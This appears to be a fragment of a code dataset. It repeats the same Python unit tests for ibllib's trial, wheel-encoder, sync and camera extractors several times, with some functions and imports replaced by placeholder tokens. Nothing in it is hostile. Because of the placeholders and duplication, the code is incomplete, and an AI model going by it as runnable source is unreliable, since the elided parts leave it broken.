sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def 
test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 
37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def 
test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in 
path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_lt5(file_events)\n            self.assertTrue(dy.size > 6)\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            
import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def 
test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n 
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        self.assertEqual(matches.size, tsb.size)\n        matches = camera.attribute_times(tsa, tsb, take='nearest')\n        expected[np.r_[1:3]] = expected[1:3] + 1\n        np.testing.assert_array_equal(matches, 
expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n 